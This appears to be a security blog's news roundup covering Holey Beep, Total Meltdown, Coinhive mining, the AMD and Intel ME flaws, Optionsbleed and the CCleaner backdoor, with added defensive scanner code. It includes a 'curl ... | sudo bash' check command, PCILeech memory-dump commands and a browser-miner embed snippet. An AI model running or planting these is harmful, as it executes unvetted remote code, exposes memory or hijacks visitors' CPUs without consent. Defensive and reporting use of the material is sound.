Holey Beep (CVE-2018-0492) is the latest breakthrough in the field of acoustic cyber security research.

https://twitter.com/0dayMarketing is writing about a cool-sounding vuln that was discovered.

Am I vulnerable?

Most likely! If you have beep installed as setuid and it was compiled with a certain compiler version and options and your machine is compromised, your network is at risk.

Please run this command to find out: curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
If your computer is vulnerable it will beep.

Is this vulnerability serious?

Holey Beep is just a simple privilege escalation bug. However, it can be used in an exploit chain to trigger more serious issues.

Were there any signs of exploitation in the wild?

We found this YouTube video that outlines the exploitation steps.

TURLA aka EpicTurla, Waterbug, Whitebear, Venomous Bear, KRYPTON, TAG_0530, Pfinet, WRAIT, Group 88, Snake, Hippo Team

While preparing a background training for my team, I wrote up the famous "Turla" group; you might be interested in it.
Technically speaking, a fascinating, professional and skilled group.

Read the whole story via this link on my page.

Multi-Stage Email Word Attack Without Macros

Recently, we have been receiving a lot of standard macro-related downloaders, most of them distributed from the Necurs botnet. However, the sample we look at today takes a longer, macro-less approach.

We have been monitoring an email spam campaign where opening the attachment downloads a password stealer as its final payload. However, getting to that payload uses a four-stage infection process, as summarized below.

Continue reading at:

Notice to stakeholders: withdrawal of the United Kingdom and EU rules on .eu domain names

Even the internet is affected by the UK's vote to "Brexit".

As of the withdrawal date, undertakings and organisations that are established in the United Kingdom but not in the EU, and natural persons who reside in the United Kingdom will no longer be eligible to register .eu domain names or, if they are .eu registrants, to renew .eu domain names registered before the withdrawal date.

 

Rs 500, 10 minutes, and you have access to a billion Aadhaar records (the details of 1.4 billion Indian citizens)



Read the complete article here.

"It was only last November that the UIDAI asserted that “Aadhaar data is fully safe and secure and there has been no data leak or breach at UIDAI.” Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far."

 

A quick chat, and full access

  • 12:30 pm: This correspondent posing as ‘Anamika’ contacted a person on WhatsApp number 7610063464, who introduced himself as ‘Anil Kumar’. He was asked to create an access portal.
  • 12:32 pm: Kumar asked for a name, email ID and mobile number, and also asked for Rs 500 to be credited in his Paytm No. 7610063464.
  • 12:35 pm: This correspondent created an email ID, aadharjalandhar@gmail.com, and sent mobile number ******5852 to the anonymous agent.
  • 12:48 pm: Rs 500 transferred through Paytm.
  • 12:49 pm: This correspondent received an email saying, “You have been enrolled as Enrolment Agency Administrator for ‘CSC SPV’. Your Enrolment Agency Administrator ID is ‘Anamika_6677’.” Also, it was said that a password would be sent in a separate mail, which followed shortly.
  • 12:50 pm: This correspondent had access to the Aadhaar details of every Indian citizen registered with the UIDAI.

Oracle vs. Google is still a thing, thanks to US federal court

Engadget writes about a 9.3 billion dollar fine against Google:

"The fight between Oracle and Google has been going on for years, and now there's been a development, according to Bloomberg. The US Court of Appeals found that Google violated Oracle's copyrights through its use of Java code in the Android operating system. The case is now going back to a California federal court to determine how much Alphabet owes Oracle. The Supreme Court has already sent this case back down once, but you can bet that Google will appeal this decision."

Continue here...

Mastermind behind €1 billion cyber bank robbery arrested in Spain

The Spanish news site "The Local" has a nice article about justice being done in the real world. :-)


Spain and Europol on Monday announced the arrest of a Ukrainian man dubbed the mastermind of a gang behind hundreds of cyberattacks that have netted around a billion euros from banks.

Continue here...

Total Meltdown?

Posted by at his blog:

...

"Did you think Meltdown was bad? Unprivileged applications being able to read kernel memory at speeds possibly as high as megabytes per second was not a good thing.

Meet the Windows 7 Meltdown patch from January. It stopped Meltdown but opened up a vulnerability way worse ... It allowed any process to read the complete memory contents at gigabytes per second, oh - it was possible to write to arbitrary memory as well." ...

Can I try this out myself?

Yes absolutely. The technique has been added as a memory acquisition device to the PCILeech direct memory access attack toolkit. Just download PCILeech and execute it with device type: -device totalmeltdown on a vulnerable Windows 7 system.

Dump memory to file with the command: pcileech.exe dump -out memorydump.raw -device totalmeltdown -v -force

If you have the Dokany file system driver installed you should be able to mount the running processes as files and folders in the Memory Process File System - with the virtual memory of the kernel and the processes as read/write.

To mount the processes issue the command: pcileech.exe mount -device totalmeltdown

Mine cryptocurrencies Monero (XMR) and Electroneum (ETN) using CoinHive

How easy it is to use your visitors' browsers to mine some bitcoins for you...

Load the Coinhive Miner and start mining

<script src="httxs://coinhive[.]com/lib/coinhive[.]min[.]js"></script>
<script>
	var miner = new CoinHive[.]User('SITE_KEY', 'john-doe');
	miner.start();
</script>

Get the number of hashes solved by a user

curl "httxs://api[.]coinhive[.]com/user/balance?name=john-doe&secret=<secret-key>"
# {success: true, name: "john-doe" balance: 4096}

FossBytes compiled a good list of actions you can take to fight against it.

  1. No Coin
  2. minerBlock Chrome extension
  3. NoScript
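As an added example (not code from this page, from Coinhive or from any of the blockers listed above), here is the kind of check a No Coin or minerBlock style blocker performs: a small Python scanner that flags script tags loading the Coinhive library or calling its API in the page's HTML. The crypto-loot.com host is an assumption; the page only names the service.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Blocklist of mining-script hosts. coinhive.com is the host used in the snippet
# above; crypto-loot.com is assumed as the host of the "crypto-loot" service.
MINER_HOSTS = {"coinhive.com", "crypto-loot.com"}
# API names the inline snippet above calls; matching them catches a copied
# loader even when the library is served from another host.
MINER_IDENTIFIERS = ("CoinHive.User", "CoinHive.Anonymous")


class MinerScanner(HTMLParser):
    """Collects (kind, evidence) findings for each miner-related <script>."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = dict(attrs).get("src")
        if not src:
            return
        host = (urlparse(src).hostname or "").lower()
        if host in MINER_HOSTS or any(host.endswith("." + h) for h in MINER_HOSTS):
            self.findings.append(("external-miner", src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here; look for the miner's constructor calls.
        if self._in_script:
            for ident in MINER_IDENTIFIERS:
                if ident in data:
                    self.findings.append(("inline-miner", ident))


def scan_html(html):
    """Return the list of miner findings for one HTML document."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: the loader from the snippet above plus a benign script.
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.User('SITE_KEY', 'john-doe');
  miner.start();
</script>
<script src="https://cdn.example.org/app.js"></script>
</head><body></body></html>"""
```

The same host list can be enforced server-side as a Content-Security-Policy script-src allowlist, which stops the loader before any extension has to intervene.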

And Palo Alto published a very good write-up with a lot of background information on that topic. A must read, I think.

Yuchen Zhou, Jun J. Wang, Wayne Xin, Wei Xu Oct 17, 2017 at 12:00 AM

Cryptocurrencies have taken the world by storm, from the biggest player Bitcoin to newcomers such as Monero and Ethereum. Cryptocurrency mining has thus become a hot industry, from powerful, dedicated mining hardware to exploiting graphics cards' parallel computing power. Recently, browser coin mining has taken off, for a lot of different reasons. Although the computing power (per instance) is much less than dedicated hardware, being able to exploit many users on various sites more than makes up for it. There is already quite some media coverage on them, such as BBC, and malwarebytes. While we do not consider crypto-currency mining inside browsers malicious by itself, it is often the case that such mining is going on without the end user's consent or even knowledge that makes this practice shady and despicable.

Coinhive, one of the more popular browser-mining services out there, offers site owners a piece of JavaScript for easy integration. Site owners exploit site visitors' CPU time to mine XMRs (Moneros) for Coinhive, and Coinhive pays out 70% of mined value to site owners. A new player, crypto-loot, emerged recently which offers similar services but pays out 88% of revenue. ... continue here

 

AMD allegedly has its own Spectre-like security flaws

On March 12, 2018, AMD received a communication from CTS Labs regarding research into security vulnerabilities involving some AMD products. Less than 24 hours later, the research firm went public with its findings. Security and protecting users’ data is of the utmost importance to us at AMD and we have worked rapidly to assess this security research and develop mitigation plans where needed. This is our first public update on this research, and will cover both our technical assessment of the issues as well as planned mitigation actions. Continue reading the post from mark.papermaster (AMD Corporate employee).

 

Vulnerability Groups | Problem Description & Method of Exploitation | Potential Impact | Planned AMD Mitigation

MASTERKEY and PSP Privilege Escalation (AMD Secure Processor or “PSP” firmware)
  Problem Description & Method of Exploitation: Issue: Attacker who already has compromised the security of a system updates flash to corrupt its contents. AMD Secure Processor (PSP) checks do not detect the corruption. Method: Attacker requires Administrative access.
  Potential Impact: Attacker can circumvent platform security controls. These changes are persistent following a system reboot.
  Planned AMD Mitigation: Firmware patch release through BIOS update. No performance impact is expected. AMD is working on PSP firmware updates that we plan to release in the coming weeks.

RYZENFALL and FALLOUT (AMD Secure Processor firmware)
  Problem Description & Method of Exploitation: Issue: Attacker who already has compromised the security of a system writes to AMD Secure Processor registers to exploit vulnerabilities in the interface between x86 and AMD Secure Processor (PSP). Method: Attacker requires Administrative access.
  Potential Impact: Attacker can circumvent platform security controls but is not persistent across reboots. Attacker may install difficult to detect malware in SMM (x86).
  Planned AMD Mitigation: Firmware patch release through BIOS update. No performance impact is expected. AMD is working on PSP firmware updates that we plan to release in the coming weeks.

CHIMERA (“Promontory” chipset)
  “Promontory” chipset used in many socket AM4 desktop and socket TR4 high-end desktop (HEDT) platforms. AMD EPYC server platforms, EPYC and Ryzen Embedded platforms, and AMD Ryzen Mobile FP5 platforms do not use the “Promontory” chipset.
  Problem Description & Method of Exploitation: Issue: Attacker who already has compromised the security of a system installs a malicious driver that exposes certain Promontory functions. Method: Attacker requires Administrative access. Attacker accesses physical memory through the chipset.
  Potential Impact: Attacker installs difficult to detect malware in the chipset but is not persistent across reboots.
  Planned AMD Mitigation: Mitigating patches released through BIOS update. No performance impact is expected. AMD is working with the third-party provider that designed and manufactured the “Promontory” chipset on appropriate mitigations.

 

 

Disabling Intel ME 11 via undocumented mode

Read this fantastic article to learn how to disable what is probably the biggest NSA backdoor, by using an off-switch the NSA had implemented for its own high-security systems.

As per Mark Ermolov, Maxim Goryachy:

"Our team of Positive Technologies researchers has delved deep into the internal architecture of Intel Management Engine (ME) 11, revealing a mechanism that can disable Intel ME after hardware is initialized and the main processor starts. In this article, we describe how we discovered this undocumented mode and how it is connected with the U.S. government's High Assurance Platform (HAP) program."

The remaining text of the article is available here.

If you are interested in a deeper dive into this area, read the eBook by Xiaoyu Ruan.

 

Optionsbleed - HTTP OPTIONS method can leak Apache's server memory

If you're using the HTTP protocol in everyday Internet use you are usually only using two of its methods: GET and POST. However, HTTP has a number of other methods, so I wondered what you can do with them and if there are any vulnerabilities.

One HTTP method is called OPTIONS. It simply allows asking a server which other HTTP methods it supports. The server answers with the "Allow" header and gives us a comma separated list of supported methods.

A scan of the Alexa Top 1 Million revealed something strange: Plenty of servers sent out an "Allow" header with what looked like corrupted data. Some examples:
Allow: ,GET,,,POST,OPTIONS,HEAD,,
Allow: POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE
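An added example (not code from the page or from the Optionsbleed research) of how an operator can screen their own servers' OPTIONS responses for the symptoms shown above: a Python checker that flags Allow header values containing empty list elements, duplicated methods or elements that are not valid HTTP tokens. The sample header lines are constructed from the four corrupted values quoted above.

```python
import re

# RFC 7230: a method name is a single "token"; anything else in the Allow list
# (spaces, colons, slashes, HTML) cannot be a method and points at leaked bytes.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")


def analyze_allow(header_value):
    """Inspect one Allow header value.

    Returns (suspicious, reasons): suspicious is True when the list contains
    empty elements, duplicate methods or elements that are not valid tokens,
    the three symptoms visible in the corrupted examples above.
    """
    parts = [p.strip() for p in header_value.split(",")]
    reasons = []

    empties = parts.count("")
    if empties:
        reasons.append(f"{empties} empty list element(s)")

    non_tokens = [p for p in parts if p and not _TOKEN.match(p)]
    if non_tokens:
        reasons.append("non-token element(s): " + "; ".join(repr(p) for p in non_tokens))

    seen, dups = set(), []
    for p in parts:
        if p and p in seen and p not in dups:
            dups.append(p)
        seen.add(p)
    if dups:
        reasons.append("duplicate method(s): " + ", ".join(dups))

    return (bool(reasons), reasons)


def scan_allow_headers(header_lines):
    """Run analyze_allow over raw 'Allow: ...' header lines; return the flagged ones."""
    flagged = []
    for line in header_lines:
        name, _, value = line.partition(":")
        if name.strip().lower() != "allow":
            continue
        suspicious, reasons = analyze_allow(value.strip())
        if suspicious:
            flagged.append((value.strip(), reasons))
    return flagged


# Constructed sample: one clean value plus the four corrupted values quoted above.
SAMPLE_HEADERS = [
    "Allow: GET,HEAD,POST,OPTIONS",
    "Allow: ,GET,,,POST,OPTIONS,HEAD,,",
    "Allow: POST,OPTIONS,,HEAD,:09:44 GMT",
    'Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"',
    "Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE",
]

if __name__ == "__main__":
    for value, reasons in scan_allow_headers(SAMPLE_HEADERS):
        print(value, "->", "; ".join(reasons))
```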

... read the whole article at the original website.

 

CCleaner had a backdoor

Paul Yung
VP, Products

Dear CCleaner customers, users and supporters,

We would like to apologize for a security incident that we have recently found in CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191. A suspicious activity was identified on September 12th, 2017, where we saw an unknown IP address receiving data from software found in version 5.33.6162 of CCleaner, and CCleaner Cloud version 1.07.3191, on 32-bit Windows systems. Based on further analysis, we found that the 5.33.6162 version of CCleaner and the 1.07.3191 version of CCleaner Cloud were illegally modified before they were released to the public, and we started an investigation process. We also immediately contacted law enforcement units and worked with them on resolving the issue. Before delving into the technical details, let me say that the threat has now been resolved in the sense that the rogue server is down, other potential servers are out of the control of the attacker, and we’re moving all existing CCleaner v5.33.6162 users to the latest version. Users of CCleaner Cloud version 1.07.3191 have received an automatic update. In other words, to the best of our knowledge, we were able to disarm the threat before it was able to do any harm.

Technical description
An unauthorized modification of the CCleaner.exe binary resulted in an insertion of a two-stage backdoor capable of running code received from a remote IP address on affected systems.

The suspicious code was hidden in the application’s initialization code called CRT (Common Runtime) that is normally inserted during compilation by the compiler. This code modification was executed by the following function calls (functions marked by red represent the CRT modifications):

 

This modification performed the following actions before the main application’s code:

  • It decrypted and unpacked hardcoded shellcode (10 kB large) - simple XOR-based cipher was used for this.
  • The result (16 kB in size) was a DLL (dynamic link library) with a missing MZ header.
  • This DLL was subsequently loaded and executed in an independent thread.
  • Afterwards, a normal execution of CRT code and main CCleaner continued, resulting in the thread with payload running in the background.

Illustration of patched CRT code (see the added call to a payload-decryption routine in the modified version):

The code executed within that thread was heavily obfuscated to make its analysis harder (encrypted strings, indirect API calls, etc.). The suspicious code was performing the following actions:

  • It stored certain information in the Windows registry key HKLM\SOFTWARE\Piriform\Agomo:
    • MUID: randomly generated number identifying a particular system. Possibly also to be used as communication encryption key.
    • TCID: timer value used for checking whether to perform certain actions (communication, etc.)
    • NID: IP address of secondary CnC server
  • Besides that, it collected the following information about the local system:
    • Name of the computer
    • List of installed software, including Windows updates
    • List of running processes
    • MAC addresses of first three network adapters
    • Additional information whether the process is running with administrator privileges, whether it is a 64-bit system, etc.
  • All of the collected information was encrypted and encoded by base64 with a custom alphabet.
  • The encoded information was subsequently submitted to an external IP address 216.126.x.x (this address was hardcoded in the payload, and we have intentionally masked its last two octets here) via a HTTPS POST request. There was also a [fake] reference to “Host: speccy.piriform.com” in communication.
  • The code then read a reply from the same IP address, providing it with the functionality to download a second stage payload from the aforementioned IP address. The second stage payload is received as a custom base64-encoded string, further encrypted by the same xor-based encryption algorithm as all the strings in the first stage code. We have not detected an execution of the second stage payload and believe that its activation is highly unlikely.
  • In case the IP address becomes unreachable, a backup in the form of DGA (domain name generator) activates and is used to redirect communication to a different location. Fortunately, these generated domains are not under the control of the attacker and do not pose any risk.
At this stage, we don’t want to speculate how the unauthorized code appeared in the CCleaner software, where the attack originated from, how long it was being prepared and who stood behind it. The investigation is still ongoing. We want to thank the Avast Threat Labs for their help and assistance with this analysis.

Again, we would like to apologize for any inconvenience this incident could have caused to our clients; we are taking detailed steps internally so that this does not happen again, and to ensure your security while using any of our Piriform products. Users of our cloud version have received an automated update. For all other users, if you have not already done so, we encourage you to update your CCleaner software to version 5.34 or higher, the latest version is available for download here.

Thank you,

Paul Yung
VP Products
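An added example (not code from Piriform or Avast) of turning the registry indicator in the description above into a host check: a Python parser for a `reg export` text that reports whether the HKLM\SOFTWARE\Piriform\Agomo key with its MUID, TCID and NID values is present. The sample export is constructed, and the value types it shows are an assumption; the description above does not state them.

```python
import re

# Indicator from the description above: the backdoor's registry key and the
# value names it stores there.
AGOMO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo"
AGOMO_VALUES = ("MUID", "TCID", "NID")

_KEY_LINE = re.compile(r"^\[(.+)\]\s*$")
_VALUE_LINE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text):
    """Parse the text of a 'reg export' (.reg) file into {key: {name: raw value}}.

    A real export is UTF-16 with a BOM; decode it to str before calling this.
    """
    keys, current = {}, None
    for line in text.splitlines():
        m = _KEY_LINE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def find_agomo_indicators(reg_text):
    """Return the Agomo values present on the host ({} when none are found).

    Registry key names are case-insensitive, so the lookup lower-cases them.
    """
    keys = parse_reg_export(reg_text)
    by_lower = {k.lower(): v for k, v in keys.items()}
    values = by_lower.get(AGOMO_KEY.lower(), {})
    return {name: values[name] for name in AGOMO_VALUES if name in values}


# Constructed sample export (value types assumed; the description above does
# not state them) and a clean export of the parent key for comparison.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Piriform]

[HKEY_LOCAL_MACHINE\SOFTWARE\Piriform\Agomo]
"MUID"=dword:1a2b3c4d
"TCID"=dword:00000e10
"NID"="203.0.113.10"
'''
CLEAN_REG = "Windows Registry Editor Version 5.00\n\n[HKEY_LOCAL_MACHINE\\SOFTWARE\\Piriform]\n"

if __name__ == "__main__":
    print(find_agomo_indicators(SAMPLE_REG) or "no Agomo indicators found")
```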
